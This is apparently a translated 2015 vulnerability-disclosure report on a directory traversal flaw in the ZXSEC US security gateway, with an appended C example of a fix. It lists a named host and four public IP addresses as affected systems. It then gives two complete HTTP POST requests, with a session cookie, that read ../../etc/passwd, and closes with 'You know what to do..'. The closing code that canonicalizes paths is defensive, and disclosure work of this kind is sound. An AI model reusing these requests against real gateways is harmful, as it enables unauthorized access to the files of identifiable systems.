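2015-03-13: Details reported to the vendor; awaiting vendor handling
2015-03-13: Vendor has confirmed; details disclosed to the vendor only
2015-03-16: Details opened to third-party security partners
2015-05-07: Details disclosed to core white hats and experts in related fields
2015-05-17: Details disclosed to regular white hats
2015-05-27: Details disclosed to intern white hats
2015-06-11: Details disclosed to the public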
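As the title says.
The ZXSEC US unified security gateway system does not adequately filter directory traversal sequences such as ../ in user input, so a malicious user can submit directory traversal sequences to read arbitrary files on the server. Weak-password cases: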
https://www.lngmxx.com/
https://60.13.3.21/
https://58.42.250.234/
https://120.195.49.238/
https://124.163.249.126/
First location:
Second location:
First location:
POST /cgi-bin/webapp?op=_zj_mrqcfib_pbq&filename=3 HTTP/1.1
Host: www.lngmxx.com
Connection: keep-alive
Content-Length: 55
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://www.lngmxx.com
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00
Content-Type: application/x-www-form-urlencoded
Referer: https://www.lngmxx.com/cgi-bin/webapp?op=_zj_mrqcfib_pelt&rname=config.cfg&fileid=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: SESSIONID=bfa4a2bad5a3894f020aff177266e1b1

way=0&txt_sfile=../../etc/passwd&submit3=%B5%BC%B3%F6++
Second location; requires the SMTP service to be configured:
POST /cgi-bin/webapp?op=_zj_jxfi_pbka_pbq HTTP/1.1
Host: www.lngmxx.com
Connection: keep-alive
Content-Length: 777
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: https://www.lngmxx.com
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQLDwEXGyzfjgAgLG
Referer: https://www.lngmxx.com/cgi-bin/webapp?op=_zj_jxfi_pbka_pelt
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: SESSIONID=bfa4a2bad5a3894f020aff177266e1b1

------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="receiver_address"

邮箱地址@qq.com
------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="subject"

test
------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="content"

test
------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="con_num"

4
------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="type"

1
------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="com_filetxt"

../../etc/passwd
------WebKitFormBoundaryQLDwEXGyzfjgAgLG
Content-Disposition: form-data; name="com_file_value"

../../etc/passwd
------WebKitFormBoundaryQLDwEXGyzfjgAgLG--
You know what to do..
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-03-13 20:13
Thanks~
None yet
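
One way to close the missing ../ filtering described in this report, as an added example that is not from the original report or the vendor's code: canonicalize the requested name under a fixed directory and reject anything that resolves outside it, instead of trying to strip traversal sequences from the string. The function names, the choice of C for a CGI handler, and the base directories used here are assumptions for illustration.

```c
#define _XOPEN_SOURCE 700            /* exposes realpath() */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: resolve user-supplied `name` beneath `base`.
 * Returns 0 and writes the canonical path to `out` when the result stays
 * inside `base`; returns -1 for anything else. */
int resolve_under(const char *base, const char *name, char *out, size_t outlen)
{
    char base_real[PATH_MAX], joined[PATH_MAX], resolved[PATH_MAX];

    if (!base || !name || name[0] == '\0' || name[0] == '/')
        return -1;                   /* empty or absolute input */
    if (!realpath(base, base_real))
        return -1;                   /* base directory must exist */
    int n = snprintf(joined, sizeof joined, "%s/%s", base_real, name);
    if (n < 0 || (size_t)n >= sizeof joined)
        return -1;                   /* over-long input is rejected, not truncated */
    if (!realpath(joined, resolved))
        return -1;                   /* missing file or unresolvable path */
    size_t blen = strlen(base_real);
    if (strncmp(resolved, base_real, blen) != 0 || resolved[blen] != '/')
        return -1;                   /* ../ or a symlink led outside base */
    if (strlen(resolved) >= outlen)
        return -1;
    strcpy(out, resolved);
    return 0;
}

/* Convenience wrapper: 1 if `name` stays inside `base`, otherwise 0. */
int stays_inside(const char *base, const char *name)
{
    char tmp[PATH_MAX];
    return resolve_under(base, name, tmp, sizeof tmp) == 0;
}

int main(void)
{
    /* Constructed sample inputs; the second is the value from the report. */
    const char *samples[] = { "share", "../../etc/passwd", "/etc/passwd" };
    for (size_t i = 0; i < 3; i++)
        printf("%-18s -> %s\n", samples[i],
               stays_inside("/usr", samples[i]) ? "allowed" : "rejected");
    return 0;
}
```

The handler should open the canonical path written to `out`, not the original request string, so that the file checked is the file read.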